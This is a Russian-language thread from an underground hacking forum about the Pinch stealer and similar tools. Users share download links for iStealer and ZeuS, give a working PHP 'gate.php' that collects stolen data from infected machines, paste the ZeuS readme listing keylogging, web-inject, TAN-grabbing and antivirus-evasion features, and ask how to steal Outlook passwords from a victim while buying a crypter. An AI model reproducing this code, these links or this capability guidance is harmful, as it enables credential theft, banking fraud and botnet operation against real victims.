• XSS.stack #1 – первый литературный журнал от юзеров форума

Pinch

Отслеживать
zeus - единственный доступный паблик аналог (ну или максимально похож по некоторому набору функций)
А где можно взять паблик версию? Я здесь на сайте теме глянул и ничего работчего не нашел. Там половина ссылок битые.
zeus немного для других целей служит
Для каких?
нелохой аналог пинчу - iStealer 6.
А где его можно взять?

И еще что можете сказать по поводу лимбо?
 
Империал
В Гугле или тут. Плохо искал, честно скажу

iStealer 5.0.1
http://dump.ru/file/4417587

Zeus куча разных версий (одна из них с эксплойта.ин похоже, запаролен архивчик "Зевс 1.2.7.19 с Firefox модулем". если Ar3s
пасс-таки скажет wink.gif )
http://dump.ru/file/4417611

ЗЫ. А вот Лимбо сам ищу рабочий




[mod][Ar3s] Блин. Случайно пост затер, восстанавливал из кэша. На эксплоите в привате первом лежит лимбо.[/mod]
 
DASM32
Спасибо! Буду разбираться :)
Только при попытке запустить iStealer 5.0.1 выдаеться ошибка
Отказано в достпе к указаному устройству, пути или файлу. Возможно, у вас нет нужных прав доступа к этому объекту
На винде у меня админмские права!
Винда у меня XP Pro 3 SP (Zver CD)
 
GOONER Спасибо, щас гляну!
Все я понял в чем проблема! Это касперыч блокировал у меня запуск iStealer'a
А скажите для него нужен в обязательном порядке платный хост, или сойдет и бесплатный?
 
По просьбе
gate.php

Код: 
<?
//CFG
$mode = 2;  	//1.Send to e-mail, 2.Save to file, 3.E-mail+file
$rndatch = FALSE;	//Random reports names
$savetodir = TRUE;	//Save rerorts to changed directory	
$dirname = "reps";	//Directory name

// a - recepient
// b - subject
// c - message body
// d - file name(not *.php)

//Getting data
$ip=getenv("REMOTE_ADDR");
$email=$_POST['a'];
$subject=$_POST['b']."(".$ip.")";
$msg = str_replace(" ","+",$_POST['c']);
$var = $_POST['d'];


//Storing || Sending data
//via E-Mail
IF($mode == 1 || $mode == 3){

  IF($rndatch){
    $array = range('a','z');
    $c=count($array);
    $var = $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . rand(0,9) . rand(0,9) . ".bin";
  };

  $headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
  $headers.= "Content-Transfer-Encoding: base64\n";
  $headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
  mail($email, $subject, $msg, $headers);
};

//via File
IF($mode == 2 || $mode == 3){

//To dir
 IF($savetodir){
 // @mkdir($dirname);
  @chdir($dirname);
 }

  //$vartype=substr($var,-3,3);
 // IF($vartype == "php")
 $var.=".rep";

   $filename = date('H_i-d.m.Y',time()+3600*6)."_".$ip."_".$var;

  $fp=fopen($filename,'w');
  fwrite($fp, base64_decode($msg));
  fclose($fp);
};
?>

<title>ret_ok</title>
 

Вложения

  • gate.php
    1.3 КБ · Просмотры: 29
у меня такой вопросик, что можно с zeus делать?
Если к Зевсу найдешь Данаю, то можешь создать Персея.
А там с помощью Персея можешь захватить медузу, убить кракена....
Ну а дальше - больше.
 
У меня такой вопрос, что можно с zeus делать
Из ReadMe файла первых версий бота...:
Описание продукта
ZeuS - Шпионское ПО (Spyware, далее "бот") для 32-х разрядной MS Windows 2000/XP+ служит для управления компьютерами жертв и получения с них информации при помощи ведения логов.

ZeuS состоит из трех частей:
Панель управления, которая устанавливается на сервер(а).
Билдер, является приложением для Windows, служит для задания конфигурации бота.
Бот, является приложением для Windows, но уже запускается на компьютере жертвы.
Внимание! В зависимости от количества активных ботов, сборки, и настройки, вам понадобится от обычного хостинга до мощного сервера или серверов.

ZeuS имеет следующие основные возможности и свойства (здесь приведен полный список, в вашей сборке часть этого списка может отсутствовать):
Бот:
Написан на VC++ 8.0, без использования RTL и т.д., на чистом WinAPI, за счет этого достигается маленький размер (10-25Кб, зависит от сборки).
Не имеет собственного процесса, за счет этого нельзя обнаружить в списке процессов.
Обход большинства фаерволов (включая популярный Outpost Firewall версий 3, 4, но сущетвует временная небольшая проблема с антишпионом). Не дает гарантии беспрепятственного приема входящих соединений.
Сложно обнаружить поиском/анализом, бот устанавливается жертве и создает файл с временем системных файлов и произвольным размером.
Работает в лимитированных учетных записях Windows (работа в гостевой учетной записи в настоящее время не поддерживается).
Невидим для экваристики антивирусов, тело бота зашифровано.
Некоем образом не создает подозрения на свое присутствие, если вы это не захотите. Здесь имеется ввиду то, что любят делать многие авторы spyware: выгрузка фаерволов, антивирусов, запрет на их обновление, блокировка Ctrl+Alt+Del и т.д.
Блокировка Windows Firewall (данная функция требуется только для беспрепятственного приема входящих соединений).
Все свои настройки/логи/команды бот хранит/принимает/передает в зашифрованном виде по HTTP(S) протоколу. (т.е. в текстовом виде данные будете видеть только вы, все остальное бот<->сервер будет выглядеть как мусор).
Обнаружение NAT при помощи проверки своего IP через указанный вами сайт.
Отдельный файл конфигурации, что позволяет себя защитить от потери ботнета в случаи недоступности основного сервера. Плюс дополнительные (резервные) файлы конфигурации, к которым бот будет обращаться, когда не будет доступен основной файл конфигурации. Эта система гарантирует выживание вашей ботнета в 90% случаях.
Возможность работать с любыми браузерами/программами работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.):
Перехват POST-данных + перехват нажатых клавиш (включая вставленные данные из буфера обмена).
Прозрачный URL-редирект (на фейк-сайты и т.д.) c заданием простейших условий редиректа (например: только при GET или POST запросе, при наличии или отсутствии определенных данных в POST-запросе).
Прозрачная HTTP(S) подмена содержимого (Веб-инжект, который позволяет подменять не только HTML страницы, но и любой другой тип данных). Подмена задается при помощи указания масок подмены.
Получение содержимого нужной страницы с исключением HTML-тегов. Основано на Веб-инжекте.
Настраиваемый TAN-граббер для любых стран.
Получения списка вопросов и ответов в банке "Bank Of America" после успешной авторизации.
Удаление нужных POST-данных на нужных URL.
ИДЕАЛЬНОЕ РЕШЕНИЕ ДЛЯ ВИРТУАЛЬНЫХ КЛАВИАТУР: После захода на нужную URL, происходит получение скриншота в области экрана, где была нажата левая кнопка мыши.
Получение сертификатов из хранилища "MY" (сертификаты с пометкой "Не экспортируемый" не экспортируются корректно) и его очистка. После это любой импортируемый сертификат будет сохранен на сервер.
Перехват логина/пароля протоколов POP3 и FTP в независимости от порта и запись его в лог только при удачной авторизации.
Изменение локального DNS, удаление/добавление записей в файл %system32%\drivers\etc\hosts, т.е. сопоставление указанного домена с указанным IP для WinSocket.
Сохраняет содержимое Protected Storage при первом запуске на компьютере.
Удаляет Сookies из кэша Internet Explorer при первом запуске на компьютере.
Поиск на логических дисках файлов по маске или загрузка конкретного файла.
Запись только что посещенных страницы при первом запуске на компьютере. Полезен при установки через сплойты, если вы покупаете загрузки у подозрительного сервиса, можно узнать что грузится еще параллельно.
Получение скриншота с компьютера жертвы в реальном времени, компьютер должен находится вне NAT.
Прием команд от серверной части и отправка отчета назад об успешном выполнении. (В настоящее время запуск локального/удаленного файла, немедленное обновление файла конфигурации, уничтожение ОС).
Socks4-сервер.
HTTP(S) PROXY-сервер.
Обновление бота до последней версии (URL новой версии прописывается в файле конфигурации).


Панель управления:
Для работы требуется PHP + MySQL.
Простой инсталлятор (обычно хватает ввода данных юзера MySQL и нажатия кнопки 'Install').
Многопользовательский режим, каждому пользователю можно задать определенные права доступа.
Статистика установок(инсталлов, заражений).
Статистика ботов находящихся в онлайн.
Разделение ботнета на сабботнеты.
Обзор онлайновых ботов (так же возможен фильтр)
Просмотр скриншота в реальном времени.
Просмотр и проверка Sock4.
Время нахождения бота в онлайн.
Скорость соединения (только для ботов вне NAT).
Хранении логов в базе данных. Это дает следующие преимущества:
Поиск логов по фильтру содержимого.
Поиск логов по шаблонам с выделением нужных POST данных (например позволяет выделять на сайте http://rambler.ru/ только логи и пароль, отбрасывая при поиски все остальные данные).
Хранение логов в зашифрованных файлах, в структуре директорий ботнет\страна\ID компьютера.
Отдача команд ботам (так же возможен фильтр).
При знании PHP вы можете самостоятельно перенастроить панель управления по вашем вкусу.


Билдер:
Написан на VC++ 8.0, без использования RTL и т.д. на чистом WinAPI, за счет этого достигается маленький размер (зависит от сборки, в сборке с декодером логов размер будет более 400кб, т.к. будет включена база стран по IP).
Просмотр статуса текущей системы, в качестве теста бота вы можете запустить его на своем компьютере, а потом нажатием одной кнопки удалить его.
Декодер логов, с распределением по странам.
Билдер файла конфигурации (шифрованного) и самого бота.
Полиморфный криптор BETA. В настоящее время находится на стадии тестирования, и не гарантирует сто процентную защиту от антивурсов. Но гарантировано доведение данной функции до ума в ближайшее время.
ЗЫ: Сори что малость не в той теме... Для всех вновь прибывших обсуждение и вопросы по зевсу ТУТ
 
повтор:

есть задача:
достать пароли с Outlook(express) из компьютера жертвы. ОС - windows XP или windows 7

Пинч сможет в этом помочь, или все уже давно перекрыты?
Собираюсь купить криптер. и по словам кодера - не палиться антивирусами.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх